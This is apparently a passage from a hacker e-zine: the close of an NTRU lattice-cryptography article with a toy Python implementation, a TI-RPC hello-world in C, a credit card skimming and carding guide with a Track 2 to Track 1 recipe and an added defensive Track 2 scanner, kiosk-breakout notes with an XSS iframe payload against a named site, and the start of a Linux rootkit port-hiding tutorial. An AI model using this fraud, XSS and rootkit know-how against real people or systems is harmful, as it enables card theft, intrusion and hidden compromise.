       = \sum_{j=1}^{n} ( (T^(j-1)·f)[i]·m[j] + (T^(j-1)·g)[i]·r[j] )
       = \sum_{j=1}^{n} ( f[i-j+1]·m[j] + g[i-j+1]·r[j] ).

Write f' := f - e(1) for the vector chosen in step 1 of NTRU-KEY-GENERATION.
The absolute value of v[i] is maximized when all signs line up, i.e. when

  f'[i-j+1] = -p whenever m[j] = -1,   g[i-j+1] = -p whenever r[j] = -1,
  f'[i-j+1] =  p whenever m[j] =  1,   g[i-j+1] =  p whenever r[j] =  1.

Since m and r are d-vectors with 2d+1 nonzero entries each, the terms involving
f' contribute at most (2d+1)·p, the terms involving g at most (2d+1)·p, and the
e(1) part of f = f' + e(1) contributes exactly m[i], which is at most 1 in
absolute value. Altogether,

  |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1,

and requiring this to be smaller than q/2 is exactly condition (#).     q.e.d.
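As an added example (this is not code from the article, nor the NTRU authors' reference
implementation), here are Algorithms 1 to 3 in Python written in the article's own vector notation.
Two facts from section 2.1 do all the work: because (T*f)[i,j] = f[i-j+1], the product (T*f)·g is
the cyclic convolution of f and g, and by Lemma 2.3 the inverse of a circulant matrix mod q is again
circulant, so (T*f)^(-1) is (T*u) for the vector u solving (T*f)·u = e(1) mod q. The parameters
n = 11, q = 67, d = 2, p = 3 are a constructed toy instance chosen to satisfy (#) (8·2·3 + 4·3 + 2 =
62 < 67); q is taken prime only so that the Gauss-Jordan inversion can use field inverses. The
roundtrip() helper also checks Proposition 2.4 and (T*f)·h = g mod q on the generated key. Parameters
this small give no security at all and the arithmetic is not constant-time; the point is to see the
algorithms run, not to protect anything.

```python
import random

def conv(f, g, q=None):
    """(T*f)·g: since (T*f)[i,j] = f[i-j+1] this is the cyclic convolution of
    f and g; entries are reduced mod q when q is given."""
    n = len(f)
    h = [0] * n
    for i, fi in enumerate(f):
        if fi:
            for j, gj in enumerate(g):
                h[(i + j) % n] += fi * gj
    return [x % q for x in h] if q else h

def centered(x, q):
    """Representative t of (x mod q) with |t| minimal, i.e. t in (-q/2, q/2]."""
    t = x % q
    return t - q if t > q // 2 else t

def circulant_inverse(f, q):
    """Vector u with (T*f)·u = e(1) mod q, so (T*u) = (T*f)^(-1) mod q (the
    inverse of a circulant is circulant by Lemma 2.3).  Gauss-Jordan over
    Z(q) with q prime; returns None when (T*f) mod q is singular."""
    n = len(f)
    # Augmented system [ (T*f) | e(1) ]: row i, column j holds f[i-j+1].
    M = [[f[(i - j) % n] % q for j in range(n)] + [int(i == 0)]
         for i in range(n)]
    for col in range(n):
        piv = next((r for r in range(col, n) if M[r][col]), None)
        if piv is None:
            return None
        M[col], M[piv] = M[piv], M[col]
        inv = pow(M[col][col], -1, q)
        M[col] = [x * inv % q for x in M[col]]
        for r in range(n):
            if r != col and M[r][col]:
                fac = M[r][col]
                M[r] = [(a - fac * b) % q for a, b in zip(M[r], M[col])]
    return [M[i][n] for i in range(n)]

def d_vector(n, d, rng, scale=1):
    """Definition 2.4: d entries equal to -scale, d+1 equal to +scale, rest 0."""
    v = [0] * n
    pos = rng.sample(range(n), 2 * d + 1)
    for k in pos[:d + 1]:
        v[k] = scale
    for k in pos[d + 1:]:
        v[k] = -scale
    return v

def keygen(n, q, d, p, rng):
    """Algorithm 1; retries until (T*f) is invertible mod q."""
    while True:
        f_prime = d_vector(n, d, rng, p)   # f' in {p,0,-p}^n
        g = d_vector(n, d, rng, p)         # g  in {p,0,-p}^n
        f = f_prime[:]
        f[0] += 1                          # f := f' + e(1), so f = e(1) mod p
        f_inv = circulant_inverse(f, q)
        if f_inv is not None:
            return (f, g), conv(f_inv, g, q)   # h := (T*f)^(-1)·g mod q

def encrypt(h, m, d, q, rng):
    """Algorithm 2: c := m + (T*h)·r mod q for a random d-vector r."""
    r = d_vector(len(h), d, rng)
    return [(mi + x) % q for mi, x in zip(m, conv(h, r))]

def decrypt(f, c, q, p):
    """Algorithm 3: v := (T*f)·c mod q, lift each entry to (-q/2, q/2], then
    reduce mod p to the representative of smallest absolute value."""
    return [centered(centered(x, q), p) for x in conv(f, c)]

def params_ok(d, p, q):
    """Condition (#) of Proposition 2.5."""
    return 8 * d * p + 4 * p + 2 < q

def roundtrip(n, q, d, p, seed=2011, trials=20):
    """Generate keys, check Proposition 2.4 and (T*f)·h = g mod q, then push
    `trials` random messages through encrypt/decrypt; True iff all recovered."""
    rng = random.Random(seed)
    (f, g), h = keygen(n, q, d, p, rng)
    if [x % p for x in f] != [1] + [0] * (n - 1):      # (T*f) mod p = I
        return False
    if any(x % p for x in g) or conv(f, h, q) != [x % q for x in g]:
        return False
    for _ in range(trials):
        m = d_vector(n, d, rng)
        if decrypt(f, encrypt(h, m, d, q, rng), q, p) != m:
            return False
    return True

if __name__ == "__main__":
    n, q, d, p = 11, 67, 2, 3              # constructed toy parameters
    rng = random.Random(2011)
    (f, g), h = keygen(n, q, d, p, rng)
    m = d_vector(n, d, rng)
    c = encrypt(h, m, d, q, rng)
    print("(#) holds:", params_ok(d, p, q), " m =", m)
    print("c =", c, "\nm' =", decrypt(f, c, q, p))
    print("20 random messages recovered:", roundtrip(n, q, d, p))
```

Try roundtrip() with a q that violates (#), say q = 61 for the same d and p: the proof's bound
4dp + 2p + 1 = 31 is then no longer smaller than q/2, and the lift in step 3 of Algorithm 3 can pick
the wrong representative, so decryption starts to fail for some messages. That is the practical
content of the "weight bound" d: it caps how large the entries of (T*f)·m + (T*g)·r can grow.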
-- 3 Further Reading -----------------------------------------------------------

If you would like to read the full-blown math article, it is reference [JHLW11]
and the URL to the PDF is given below.

---- 3.1 References ------------------------------------------------------------

[LLL82]  A.K. Lenstra, H.W. Lenstra, and L. Lovasz, Factoring polynomials with
         rational coefficients, Math. Ann. 261 (1982), 515-534.

[Kan83]  R. Kannan, Improved algorithms for integer programming and related
         lattice problems, Proc. 15th ACM Symp. on Theory of Computing (STOC)
         (1983), 193-206.

[Ajt98]  M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized
         reductions, Proc. 30th STOC, ACM (1998), 10-19.

[GN08]   N. Gama and P.Q. Nguyen, Predicting lattice reduction, Advances in
         Cryptology - Proc. Eurocrypt '08, Lecture Notes in Computer Science,
         Springer 2008.

[MR09]   D. Micciancio and O. Regev, Lattice-based Cryptography, chapter in
         D.J. Bernstein, J. Buchmann and E. Dahmen (eds.), Post-Quantum
         Cryptography, 147-191, Springer 2009.

[JHLW11] J. Huettenhain and L.A. Wallenborn, Lattice-Based Methods, Seminar
         Topics in Post-Quantum Cryptography (2011),
         http://www.uni-bonn.de/~rattle/works/lattices.pdf

-----------------------------------------------------------------------[ eof ]--

[==================================================================================================]
-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

/**
 * Code for creating the client and server sides of a Transport
 * Independent Remote Procedure Call "Hello World" in Linux
 *
 * i.e. not based on the SunRPC code of glibc
 *
 * Super-user access is not required, only a running portmapper
 * (rpcbind).  On most distributions the TI-RPC headers live under
 * /usr/include/tirpc, hence the -I flag in the build lines below.
 */

/* ---- server: create-tcp-rpc-server.c ----------------------------------
 *
 * gcc -I/usr/include/tirpc -o create-tcp-rpc-server create-tcp-rpc-server.c -ltirpc
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>   /* IPPROTO_TCP */
#include <rpc/rpc.h>

#define HELLO_PROG 101337 /* program number used by this demo */
#define HELLO_VERS 1
#define HELLO_PROC 1

void vexit(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

/* Called from svc_run() for every request to (HELLO_PROG, HELLO_VERS).
 * Procedure 0 is the conventional NULLPROC "ping" and gets an empty reply;
 * HELLO_PROC appends a line to the file and replies with an int, so the
 * client's rpc_call() returns instead of waiting for a reply that never
 * comes.  Note that a fixed path in /tmp is acceptable for a demo only; a
 * network-reachable service should not follow a world-writable path. */
void dispatch(struct svc_req *request, SVCXPRT *xprt)
{
    int result = 0;

    if (request->rq_proc == NULLPROC) {
        svc_sendreply(xprt, (xdrproc_t)xdr_void, NULL);
        return;
    }
    if (request->rq_proc != HELLO_PROC) {
        svcerr_noproc(xprt);
        return;
    }

    FILE *afile = fopen("/tmp/a.txt", "a");
    if (!afile)
        vexit("fopen");
    fputs("Hello World!\n", afile);
    fclose(afile);

    if (!svc_sendreply(xprt, (xdrproc_t)xdr_int, (caddr_t)&result))
        svcerr_systemerr(xprt);
}

int main(void)
{
    SVCXPRT *svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0);
    if (!svcxprt)
        vexit("svctcp_create");

    printf("xp_sock: %d\n", svcxprt->xp_sock);
    printf("xp_port: %d\n", svcxprt->xp_port);

    /* Registers (prog, vers, proto) with the local portmapper so that
     * clients can look the port up.  svc_register() returns a bool_t and
     * does not set errno, so perror() would print nothing useful here. */
    if (svc_register(svcxprt, HELLO_PROG, HELLO_VERS, dispatch, IPPROTO_TCP) != TRUE) {
        fprintf(stderr, "svc_register: failed (is rpcbind running?)\n");
        exit(EXIT_FAILURE);
    }

    svc_run();   /* never returns */
    exit(EXIT_SUCCESS);
}

/* ---- client: create-tcp-rpc-client.c ----------------------------------
 *
 * gcc -I/usr/include/tirpc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <rpc/rpc.h>

#define HELLO_PROG 101337
#define HELLO_VERS 1
#define HELLO_PROC 1

void clnt_vexit(enum clnt_stat value)
{
    clnt_perrno(value);
    exit(EXIT_FAILURE);
}

int main(int argc, char **argv)
{
    /* XDR encodes the argument from `in` and decodes the reply into `out`,
     * so both must be writable int storage, not string literals. */
    int in = 0, out = 0;
    const char *host = argc > 1 ? argv[1] : "192.168.1.113";

    /* rpc_call() asks the portmapper on `host` where HELLO_PROG/HELLO_VERS
     * is listening, connects over TCP and invokes HELLO_PROC once. */
    enum clnt_stat s = rpc_call(host, HELLO_PROG, HELLO_VERS, HELLO_PROC,
                                (xdrproc_t)xdr_int, (const char *)&in,
                                (xdrproc_t)xdr_int, (char *)&out, "tcp");
    if (s != RPC_SUCCESS)
        clnt_vexit(s);

    printf("reply: %d\n", out);
    exit(EXIT_SUCCESS);
}
- -=[ 0x05 The Tech Behind Credit Card Fraud
- -=[ Author: K141
- [[ Introduction ]]
- ---------------
- Plastics carding is by far the most profitable type of credit card fraud - the replication, or
- spoofing, of magnetic stripe data onto a secondary suitable medium (a magstripe card) being the
- most common form. I have written this paper to address the criminal procedures that are followed,
- explaining each step as basically as possible. Numerous papers and articles have been released
- that do not even touch the issues at hand: how these criminals obtain this information and, more
- generally, who does what in the spectrum of physical carding.
- While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online carding
- done, it still stands as a major contender. Technologies exist which could eradicate this type of
- attack; however, we see no intention of this from the banks as it involves critical changes in the
- current infrastructure. To date, I see no tech-related reason why this form of fraud is still
- allowed to be committed.
- [[ Track Data ]]
- ------------
- Within a credit card (a high-coercivity magnetic stripe card), there exist three tracks of data
- (three sections that are capable of storing data separately). This paper will cover the logical side
- of magstripe encoding (all three tracks and relevant data) and not the physical, that is, the widths
- of each track, polarities and coercivity. After reading, you should be more familiar with the
- processes involved in how criminals obtain and handle this data to produce profits.
- The majority of the time, Track 1 data is not needed for cashing out with plastics. This is the
- information that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist some
- terminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will always
- fill their Track 1 field. Luckily for the attacker, Track 1 can be generated entirely from Track 2
- data. It is important to mention that Track 1 is derived from the information on Track 2 and is
- often used as a fail-safe if Track 2 is damaged or cannot be read. This is also the only track that
- accepts alphanumeric characters.
- Track 2 data is the most important for 'cashing out'. This is where the relevant information for
- generating Track 1 data is held, as well as other data that allows a transaction to occur.
- Track 3 data, mostly, is null.
- Before a transaction may occur, a PIN is necessary for authentication. With that said, generally
- speaking, Track 2 data + PIN = the ability to cash out with that card.
- [[ Obtaining Track Data ]]
- -----------------------
- On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". These
- sellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimum
- amount' in order to successfully defraud at least $300 or so to make the scam worth their while. If
- a seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knows
- the balance of the said account and knows this to be low. There do exist some legitimate sellers;
- however, the data they sell is typically Track 2 only and can only be cashed out by the minority of
- the carding community.
- That being said, online vendors are not the only source of 'dumps'. An assailant may obtain Track 2
- data with PINs by either building or buying their own card skimmer.
- [[ ATM Skimming ]]
- --------------
- A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track data
- before the card is legitimately read by the machine. As the victim's credit card is entered into the
- ATM, it passes through the false fascia (the skimming device) and the Track 2 section passes over
- the Track 2 read head, stealing the information. As it only passes over the read head, this card is
- still able to enter the ATM machine and offer the same functionality as an un-tampered ATM.
- If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse it
- into a file on its storage medium, and also timestamp this data for later reference against the
- timestamped video footage of PIN entry. These skimmers must then be collected from the ATM after the
- attack is complete (usually during the early hours of the morning to avoid detection, or when the
- battery has run low).
- If the skimming device is coupled with a PIN-pad overlay, it will transmit Track 2 data and PIN via
- SMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught and
- concurrently allowing remote operation. These skimmers will only need to be revisited when the
- battery runs low.
- An ATM skimming device is comprised of a few components:
- - Fascia: To overlay the ATM mouth without suspicion.
- - T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note,
- ideally a skimmer will read only one track of information, as to keep the size of the device
- minimal.
- - Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed
- memory locations, usually a Micro-SD card or to the Bluetooth module.
- - Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting
- Track 2 data, along with PINs back to the carder.
- - Battery: To power the device.
- The components required to build these devices are inexpensive, but the main obstacle towards the
- building of a skimmer is technical know-how. I have found the price of pre-built skimmers currently
- to range from $600-$8000, as opposed to $100-700 in building costs.
- [[ POS Skimming ]]
- --------------
- Point of sale skimming is a software-based attack in which the firmware of the POS terminal is
- flashed, rather than a physical device being inserted. Common models are the VeriFone Vx510 and
- various Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target will
- believe he/she is making a purchase with their card, and a transaction will appear to process along
- with a receipt print, but no charge will actually occur. Instead, the card has just been swiped and
- the target has entered their PIN. A flashed firmware can be programmed to output a later receipt
- with all three track details, as well as the PIN, or designed to save to a file for later use. These
- skimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forced
- to comply or offered a percentage of all money made.
- An attacker wishing to purchase a chipped/flashed POS terminal will expect to pay $1000. All dumps
- are encrypted, with the seller holding the encryption key. This forces the buyer to return to the
- seller, send the encrypted file, and in return, receive only a percentage of the original skimmed
- cards. Alternatively, these skimmers can be bought out for as much as $3,000-10,000.
- [[ Obtaining Track Data Through Malware ]]
- --------------------------------------
- Although rare, ATM malware is a rising issue among those in the carding community. After the
- success of the Diebold Ghost trojan, there have been countless requests for, and confirmations of,
- the development of malware designed for specific platforms, namely the Windows CE environment, a
- favourite among ATM systems. This malware will effectively log all read card data and PINs, printing
- them to a file encrypted by the malware for later collection. Alternatively, some variants have even
- offered to print off all stolen credentials in a 'bank statement' format by using the ATM's printer.
- Needless to say, the deployment of this malware originates from an insider, usually employed or
- hired by the criminals to infect the ATM system from an ATM technician role.
- [[ Converting Track Data ]]
- -----------------------
- Track 2 data will often appear in the following format:
- 5281169568596016=14101010000045100001
- |               ||   |  |
- |               ||   |  +-- discretionary data (the CVV, 451, is embedded here)
- |               ||   +----- service code (101)
- |               |+--------- expiration date, YYMM (1410)
- |               +----------- field separator
- +--------------------------- card number
- Where:
- 5281169568596016 = credit card number
- 14 = expiry year
- 10 = expiry month
- 101 = service code
- 451 = CVV
- To generate Track 1 information from a Track 2 field, one must follow these simple steps:
- 1. Add a 'B' before the credit card number.
- 2. Replace the '=' with '^LASTNAME/FIRSTNAME^'.
- 3. Add six '0's after the T2 data.
- Thus, our outputted Track1 data should read as follows:
- B5281169568596016^LASTNAME/FIRSTNAME^14101010000045100001000000
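The defender's counterpart to the layout above is finding this data where it should not be stored (a POS host, a file share, a log) after a skimming incident. The following is an added example, not code from the article: it locates Track 2 strings in text, splits them by the field layout just described, Luhn-checks the card number and reports only a masked number. The service-code meanings, the sample lines and the second card number are assumptions constructed for the example.

```python
"""
Scanner for ISO 7813 Track 2 strings in captured text, the check a forensic
examiner runs over a suspect POS host or dump file after a skimming incident.
All sample inputs in this file are constructed for the example.
"""
import re

# PAN (13-19 digits) '=' YYMM (expiry) service code (3 digits) discretionary data
TRACK2_RE = re.compile(r"(?<!\d)(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)")

# First digit of the service code: interchange rules and whether the card
# carries an IC (chip) that a terminal should prefer over the stripe.
INTERCHANGE = {
    "1": "international",
    "2": "international, IC (chip) preferred",
    "5": "national only",
    "6": "national only, IC (chip) preferred",
    "7": "no interchange (private/bilateral)",
    "9": "test card",
}


def luhn_ok(pan):
    """Return True if the PAN passes the Luhn (mod 10) check-digit test."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:            # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep only the first six and last four digits, as PCI DSS permits in reports."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def parse_track2(raw):
    """Split one Track 2 string into its fields; returns None if it does not parse."""
    m = TRACK2_RE.fullmatch(raw)
    if not m:
        return None
    pan, yy, mm, service, discretionary = m.groups()
    return {
        "pan_masked": mask_pan(pan),
        "luhn_valid": luhn_ok(pan),
        "expiry": "20%s-%s" % (yy, mm),
        "service_code": service,
        "interchange": INTERCHANGE.get(service[0], "unknown"),
        "discretionary_len": len(discretionary),
    }


def scan_text(text):
    """Find every Track 2 candidate in text and return the parsed, masked findings."""
    return [parse_track2(m.group(0)) for m in TRACK2_RE.finditer(text)]


if __name__ == "__main__":
    # Constructed sample: a dump file as a skimmer or flashed terminal might leave behind.
    SAMPLE = (
        "2011-04-01 09:12 5281169568596016=14101010000045100001 1234\n"
        "2011-04-01 09:15 4111111111111111=25121010000012300000 4321\n"
    )
    for finding in scan_text(SAMPLE):
        print(finding)
```

The article's sample card number does not pass the Luhn check, so the first finding is reported with luhn_valid False; a scanner that only reports Luhn-valid numbers would skip it, which is worth knowing when tuning such a rule.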
- [[ Writing Track Data ]]
- --------------------
- Once both Track 1 and Track 2 fields are complete, the data is ready for writing to the blank
- medium. An attacker will ensure that the medium (magnetic stripe card) he/she selects is of high
- print quality. Services offered typically cost around $15 per card. If the attacker is running a
- large operation then he/she may even purchase the printing equipment themselves. This comprises:
- - Hi-Co Magnetic Stripe PVC Cards
- - PVC Printer (Zebra printers are well known for this purpose)
- - PVC card embosser (to emboss credentials on the card)
- - PVC card tipper (to tip the embossing with silver/gold)
- - Signature Panels (on the reverse of the card, often left out by inexperienced carders)
- - Holograms (typically stickers or hot-roll stamps)
- The magnetic stripe medium MUST be Hi-Co. Hi-Co stands for High Coercivity. This is the magnetic
- power that allows the writing of data to occur on Hi-Co cards. All credit/bank cards will be Hi-Co
- and, thus, need the appropriate device to be written to. Any device capable of writing at the
- coercivity of 4000 Oersted (Oe) on the appropriate tracks will be suitable. Note that most standard
- magstripe readers can read Hi-Co cards; coercivity only comes into question in the writing process.
- The most common magnetic stripe Hi-Co writers are the MSR-206 and MSR-606. The software packages
- supplied with these writers are extremely easy to operate, and it is only a matter of copying and
- pasting the Track 1 and Track 2 data into the blank track fields, hitting 'write', and swiping the
- blank card through the writer.
- [[ Cashing Track Data ]]
- --------------------
- After this initial attack is complete, the attacker has two options to produce profit:
- 1. Form a crew to work with, willing to cash out this data. Higher risk of law enforcement, lower
- risk of being scammed by those you work with.
- 2. Work with existing crews, often overseas. Lower risk of law enforcement, higher risk of being
- scammed by those you work with.
- Existing crews work on a percentage basis, normally offering a high percentage to the card supplier,
- and if cash out is successful, will either return that percentage through Western Union or run with
- the money. Typically, 'test cards' will be exchanged in order for these crews to prove their
- authenticity.
- Forming a crew usually means a localized operation, susceptible to investigation from local
- authorities before any foreign law enforcement bodies are involved. I believe most crews will
- operate in this manner, a localised crew, often employed by a gang or mafia to supply card data to
- their superiors for resale (such as those sold online) or cashed out by a second team.
- [[ Conclusion ]]
- ------------
- Through my experiences investigating the darker parts of the Internet, specifically carding and
- fraud, trends show that vendors of card data and/or information tend to be from a Russian source. It
- is my belief that the operations involved in obtaining and distributing this information are
- largely mafia-based. I hope the information contained within this paper is enough to deter people
- from the 'carding scene' rather than to take an interest in it for personal gain. The people
- involved are generally small fish, but around every large forum I have visited there are people with
- connections I'd dare not cross.
- [==================================================================================================]
- -=[ 0x06 Brief Notes on Retail Kiosk Hacking
- -=[ Author: storm
- -=[ Email: storm@gonullyourself.org
- -=[ Website: http://gonullyourself.org/
- If you've ever left your basement and ventured outside to the real world, you've more than likely
- come into contact with a kiosk at some point in a store or hotel. Most kiosks provide only a
- limited keyboard or run a very stripped down version of Windows, rendering certain actions difficult
- or impossible to directly achieve, but that only makes it all the more fun. This is by no means an
- exhaustive article on hacking retail kiosks, but instead a list of little tips and tricks I've
- compiled through my own personal experiences that may either help you or provide inspiration when
- approaching a new device.
- In the MSP airport, there is a kiosk running software called SiteKiosk. The device provides
- Internet access at outrageous prices ($20/hour), although complimentary access to the airport's
- website and Weather.com is so thoughtfully offered. As I sit typing this, my plane has been delayed
- about 3.5 hours due to the torrents of snow outside, so I figured messing with the kiosk would give
- me something to do other than eating candy and futilely waiting for the Boingo hotspot page to load.
- The keyboard is clunky and missing sensitive keys like Ctrl and Alt; the mouse is a trackball with
- two buttons, though the right-click button seems unresponsive. The web browser used by this kiosk
- looks very much like a version of Internet Explorer themed with cleaner icons, and the file bar and
- taskbar are hidden from view.
- With buttons like Ctrl and Alt missing or disabled, we obviously can't try special key combinations
- like Ctrl+Alt+Del, so the first step is to poke around what we can do with the software. The fact
- that we can access the airport's website and Weather.com is very curious, especially since the
- advertisements load fine (which are hosted on third-party servers), yet putting anything in the URL
- bar pops up a "please insert monies" box. Luckily, Weather.com has an XSS in their quick lookup,
- so a simple search for zip code <iframe src="http://www.google.com"></iframe> injects an IFrame into
- the page, displaying our coveted search engine.
- When a kiosk disallows access to the URL bar, whether it's trying to contain the user to a single
- web site (think the online catalog at Staples stores) or reduce functionality (until the user forks
- up their money), XSS is a good place to start. It is common enough that even if you don't come
- prepared with a known XSS in the target website, it's usually a trivial matter to find one on the
- spot. By injecting an IFrame, we gain the ability to browse any site we wish, as well as exercise
- other web browser functionality that may escalate our access, provide opportunity to escalate our
- access, or provide further information about the box.
- At this point, we have achieved free Internet access (within the IFrame), but there are more
- interesting things to do other than reading Reddit. A simple search for ha.ckers.org's iKat suite
- leads us to a swiss army knife of tools to probe the system we're on.
- Through this, we learn that our user-agent is: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
- .NET CLR 2.0.50727; SiteKiosk 6.6 Build 213)
- We can browse the filesystem by invoking the "Browse" form field, but unfortunately the lack of
- right-click doesn't let us easily open files and execute programs. If right-click were enabled, we
- would be able to browse to C:\Windows\system32\cmd.exe within the prompt, right-click the program,
- and select open to spawn a shell. Explorer.exe is also another good place to start. Once cmd.exe is
- open, we would be able to manipulate the system, probe local files or scan the network, or kill the
- kiosk software using `tasklist` and `taskkill`.
- Unfortunately, the ability to view My Computer also seemed disabled. I did not spend a large amount
- of time probing the system or enumerating all of the tools provided by iKat, but I did discover the
- existence of a file named trust-root.p7b on the Desktop which looked interesting, along with a
- shortcut to the SiteKiosk software.
- In a separate escapade, I was lucky enough to come across an Internet/printing kiosk in the lobby of
- a Marriott hotel provided by a company called iBAHN. If I recall correctly, this too was running
- SiteKiosk, but the interface looked very different than the kiosk I encountered in MSP, and it
- provided a range of additional functions such as printing and access to Microsoft Office. The
- device seemed to take great care not to give too much access to the user (the software provided its
- own, more limited filesystem browser that was meant to open documents from flash drives), but it
- wasn't perfect. By opening Microsoft Word, you could access Windows Explorer through the File menu
- or navigating the help bar in online mode, right-clicking and selecting "View Source". This would
- invoke Notepad with a File menu of its own. Viewing My Computer only showed the CD drive and USB
- stick that was currently plugged in, but it was possible to access C:\ simply by typing it in the
- navigation bar.
- There are plenty of kiosks around to play with, and many of them possess blatant holes in their
- access restriction software. Even if there is nothing inherently interesting on the device, it
- might be a good idea to check if it's connected to the network or if it dials home anywhere. Just
- in general, it's fun to circumvent the software and snoop about the device, and of course things
- like free Internet are always cool too. Some devices I've seen think they are clever, or are just
- unstable, so working or reliable methods of accessing certain kiosks, such as the ones in Barnes &
- Noble, are still to be determined. For instance, attempting to XSS the B&N website from their in-
- store kiosk results in the device locking up and calling for employee assistance. Other devices
- disable right-click, removing certain escalation opportunity and the ability to access critical
- functionality necessary for an attack.
- There is still much fun to be had, so if you have any tips, tricks, or your own kiosk-hacking
- stories, drop us a message and your submission might just be in the next zine.
- [==================================================================================================]
- -=[ 0x07 Linux Rootkit Development Update
- -=[ Author: duper
- -=[ Website: http://projects.ext.haxnet.org/~super/
- In the Linux kernel version 2.6.36, some changes to the procfs API will break the interface that
- previously existing rootkits have with /proc/net/tcp. This is a critical change as far as rootkit
- functionality goes, since a new technique is required to hide TCP ports from userland administration
- programs such as netstat(8) and other network statistics gathering tools. Thanks to fawx for
- initially bringing this issue to my attention.
- As a side note: If you have any questions about the intricacies of the Linux kernel, as we will be
- working closely with it throughout the course of this paper, consult /usr/src/linux/Documentation or
- any of the links provided as references at the bottom.
- Prior to release of the 2.6.36 patch, most Linux rootkits utilized a sequential search of the
- proc_net->subdir linked list to locate the procfs data structure corresponding to the filesystem
- pathname /proc/net/tcp. The way that entries in the /proc/net directory are accessed changed in
- 2.6.36, and as a result the majority of publicly available Linux rootkits featuring TCP connection
- hiding stopped compiling; some benign networking drivers ceased to function as well. The API wasn't
- changed in order to safeguard against rootkits -- that was only an unintended side effect.
- In reality, implementing a kernel-mode TCP data filtering mechanism is even easier with the new
- interface. A new kernel function is dedicated specifically to the purpose of initializing the
- /proc/net/tcp file. Note that I'm using the term "file" loosely in this context, as procfs doesn't
- behave like a typical filesystem that utilizes disk-based storage. In userland, when a file
- descriptor corresponding to a procfs pathname is read(), the results are actually custom-formatted
- kernel data objects. That's why /proc/net/tcp and, in fact, the majority of procfs pathnames, appear
- as empty files when the stat() system call is executed on them. Although procfs files do have
- inodes, their values approach 2**32 (the upper limit for ino_t), and thus they are outside the range
- of use for partitioned disk filesystems. Observe the differences in output between the following two
- commands:
- $ stat /proc/net/tcp
- File: `/proc/net/tcp'
- Size: 0 Blocks: 0 IO Block: 1024 regular empty file
- Device: 3h/3d Inode: 4026531957 Links: 1
- Access: (0444/-r--r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
- Access: 2011-02-19 12:16:32.853287891 -0500
- Modify: 2011-02-19 12:16:32.853287891 -0500
- Change: 2011-02-19 12:16:32.853287891 -0500
- Birth: -
- $ stat /bin/ls
- File: `/bin/ls'
- Size: 109736 Blocks: 224 IO Block: 4096 regular file
- Device: 303h/771d Inode: 7660308 Links: 1
- Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
- Access: 2010-12-25 23:33:12.000000000 -0500
- Modify: 2010-12-24 12:18:47.000000000 -0500
- Change: 2010-12-24 12:19:01.000000000 -0500
- Birth: -
- As you can see, the procfs pathname has a rather large inode number and a file size of 0, despite
- the fact that we would receive data back if we ran `cat` against it. In the preceding examples, the
- /usr/bin/stat binary (provided by the GNU coreutils package) executed the fstat() system call
- against the absolute pathnames given as arguments. In this next typescript, statfs() will be run
- due to the "-f" command line option, which is an abbreviated form of the getopt_long() option
- "--file-system", as documented in the stat(1) man page and GNU info pages.
- $ stat -f /boot
- File: "/boot"
- ID: f6c5e14bf02df87f Namelen: 255 Type: ext2/ext3
- Block size: 1024 Fundamental block size: 1024
- Blocks: Total: 32175 Free: 11084 Available: 9423
- Inodes: Total: 8320 Free: 8266
- $ stat -f /proc
- File: "/proc"
- ID: 0 Namelen: 255 Type: proc
- Block size: 4096 Fundamental block size: 4096
- Blocks: Total: 0 Free: 0 Available: 0
- Inodes: Total: 0 Free: 0
- Clearly, procfs is special since the majority of its statistical information is zeroed out. The
- glaring contrast in block size results from extfs handling disk blocks, whereas procfs handles
- memory, as stated previously. On my x86-64 kernel, getpagesize() from unistd.h returns 4096.
- However, page size is platform independent, so your mileage may vary. Note that sysfs behaves in a
- manner identical to procfs according to statfs(). If your kernel is configured to support sysfs,
- you'll find it listed under /sys in your /etc/mtab. The directory that rootkit developers would
- probably want to concern themselves the most with is /sys/kernel. Again, depending on your
- /usr/src/linux/.config or /proc/config.gz settings during the kernel's compile-time, various
- subdirectories could be available under /sys/kernel. My machine has the debug, security, and mm
- (memory manager) directories enabled currently. Now that we've gotten the basics squared away, let's
- take a look at a rootkit.
- struct proc_dir_entry *proc_find_tcp()
- {
- struct proc_dir_entry *p = proc_net->subdir;
- while (strcmp(p->name, "tcp"))
- p = p->next;
- return p;
- }
- This is from adore-ng-0.56, a rootkit I downloaded from packetstormsecurity.org. The code above
- shows the tediousness involved in accessing pathnames under the /proc/net directory. Since the
- kernel didn't have any direct access functions defined, it became necessary to loop over the
- directory entries manually. The last kernel version to be supported by this particular adore-ng
- release appears to be 2.6.16, judging by some conditional preprocessor directives within the source:
- #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,16)
- MODULE_PARM(root_fs, "s");
- MODULE_PARM(proc_fs, "s");
- MODULE_PARM(opt_fs, "s");
- #else
- module_param(root_fs, charp, 0644);
